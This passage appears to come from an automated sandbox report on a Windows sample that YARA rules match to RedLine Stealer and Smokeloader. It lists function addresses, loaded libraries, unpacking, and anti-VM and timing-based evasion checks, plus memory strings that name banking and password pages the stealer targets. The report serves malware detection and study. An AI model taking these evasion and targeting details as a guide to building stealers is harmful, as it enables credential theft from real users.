                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040136E0_2_0040136E
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00457B300_2_00457B30
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004283340_2_00428334
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041EBEB0_2_0041EBEB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00415C7E0_2_00415C7E
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004184130_2_00418413
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043A4FE0_2_0043A4FE
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00424C8D0_2_00424C8D
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043BCA40_2_0043BCA4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004165480_2_00416548
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004395350_2_00439535
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041764A0_2_0041764A
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043D6000_2_0043D600
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004126B90_2_004126B9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004297300_2_00429730
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00434FAC0_2_00434FAC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEE2EA0_2_02EEE2EA
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F042E70_2_02F042E7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF9ADA0_2_02EF9ADA
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE52D70_2_02EE52D7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F112BE0_2_02F112BE
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE22B40_2_02EE22B4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDBA830_2_02EDBA83
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F18A670_2_02F18A67
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFD2210_2_02EFD221
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F052130_2_02F05213
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F003F50_2_02F003F5
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDDBFB0_2_02EDDBFB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F2D3C10_2_02F2D3C1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F193C20_2_02F193C2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE33D40_2_02EE33D4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDE3B50_2_02EDE3B5
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDAB8F0_2_02EDAB8F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDB3900_2_02EDB390
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFC3410_2_02EFC341
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0DB370_2_02F0DB37
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F010D30_2_02F010D3
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFD8BF0_2_02EFD8BF
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE78B10_2_02EE78B1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0908F0_2_02F0908F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0D8670_2_02F0D867
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF99970_2_02EF9997
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE29200_2_02EE2920
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE5EE50_2_02EE5EE5
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF9EE20_2_02EF9EE2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF4EF40_2_02EF4EF4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED26DD0_2_02ED26DD
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE867A0_2_02EE867A
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEEE520_2_02EEEE52
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFAFE90_2_02EFAFE9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE67AF0_2_02EE67AF
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0979C0_2_02F0979C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0A7650_2_02F0A765
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0BF0B0_2_02F0BF0B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF9CC20_2_02EF9CC2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFF4DF0_2_02EFF4DF
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEC4D70_2_02EEC4D7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEB4B80_2_02EEB4B8
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F1F4AB0_2_02F1F4AB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEACB00_2_02EEACB0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0048F0_2_02F0048F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE047F0_2_02EE047F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED64720_2_02ED6472
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF7C470_2_02EF7C47
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EED4500_2_02EED450
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFBC2C0_2_02EFBC2C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED6C080_2_02ED6C08
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEFC0B0_2_02EEFC0B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0B5C90_2_02F0B5C9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFA5D40_2_02EFA5D4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F125B10_2_02F125B1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF859B0_2_02EF859B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED55400_2_02ED5540
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F06D430_2_02F06D43
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED5D110_2_02ED5D11
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeProcess token adjusted: Load DriverJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: String function: 00438E28 appears 39 times
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: String function: 02EDE3B5 appears 36 times
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: String function: 0043D070 appears 51 times
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: String function: 02EDA905 appears 38 times
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: String function: 0040E14E appears 52 times
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: String function: 004360E1 appears 144 times
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: String function: 02F0D2D7 appears 50 times
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 1708
                  Source: I2BJhmJou4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@0/1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F69F2E CreateToolhelp32Snapshot,Module32First,0_2_02F69F2E
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7500
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\98cb422e-58a4-48c6-adc8-84ceefbc0acaJump to behavior
                  Source: I2BJhmJou4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.0000000005659000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3247217603.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3247217603.0000000005008000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: I2BJhmJou4.exeReversingLabs: Detection: 84%
                  Source: unknownProcess created: C:\Users\user\Desktop\I2BJhmJou4.exe "C:\Users\user\Desktop\I2BJhmJou4.exe"
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 1708
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: fltlib.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: my-global-render.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeUnpacked PE file: 0.2.I2BJhmJou4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeUnpacked PE file: 0.2.I2BJhmJou4.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00464074 push B000468Ch; retn 0044h0_2_00464079
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00463CAD push esi; ret 0_2_00463CB6
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h0_2_00403D71
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00452768 push ecx; ret 0_2_0045277B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F229CF push ecx; ret 0_2_02F229E2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED3FD3 push eax; mov dword ptr [esp], 00000000h0_2_02ED3FD8
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED2260 Sleep,ExitProcess,0_2_02ED2260
                  Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-74297
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-74297
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-74312
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F22223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_02F22223
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F2216F FindFirstFileExW,0_2_02F2216F
                  Source: I2BJhmJou4.exe, 00000000.00000003.2003155936.0000000005072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                  Source: Amcache.hve.8.drBinary or memory string: VMware
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: I2BJhmJou4.exe, 00000000.00000002.3246415805.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3247217603.0000000005034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: I2BJhmJou4.exe, 00000000.00000002.3246415805.0000000002FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWjV
                  Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
